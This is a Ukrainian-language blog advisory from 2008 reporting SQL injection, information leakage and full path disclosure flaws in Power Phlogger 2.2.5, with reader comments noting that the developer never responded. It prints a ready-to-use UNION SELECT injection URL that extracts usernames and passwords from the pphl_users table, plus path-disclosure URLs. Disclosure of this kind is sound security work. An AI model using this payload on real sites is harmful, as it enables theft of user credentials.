Нові уразливості в Power Phlogger
23:54 31.05.2008До раніше мною оприлюднених уразливостей в Power Phlogger, повідомляю про нові уразливості в даній системі для ведення статистики відвідувань. Деякий час тому, 16.02.2008 та 31.05.2008, я виявив SQL Injection, Information Leakage та Full path disclosure уразливості в Power Phlogger. Про що найближчим часом повідомлю розробникам веб додатку.
SQL Injection:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
Information Leakage:
http://site/robots.txt
В robots.txt вказані важливі папки системи, що дозволяє знайти її ресурси та виявити інші Information Disclosure уразливості.
Full path disclosure:
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/modules/usercreate.php
Уразлива версія Power Phlogger 2.2.5 та попередні версії.
Це п’ята частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.
Неділя, 14:45 01.06.2008
Им хоть стыдно?
Неділя, 20:11 01.06.2008
Схоже, що ні . Бо на жоден з моїх листів про численні дірки в Power Phlogger девелопер так і не відповів. І відповідно не виправив їх (тому користувачам даної системи доведеться самим їх виправляти).
Причому, я вже опублікував п’ять частин уразливостей, що я знайшов в Power Phlogger. І з часом опублікую ще чимало інших дірок в даній системі.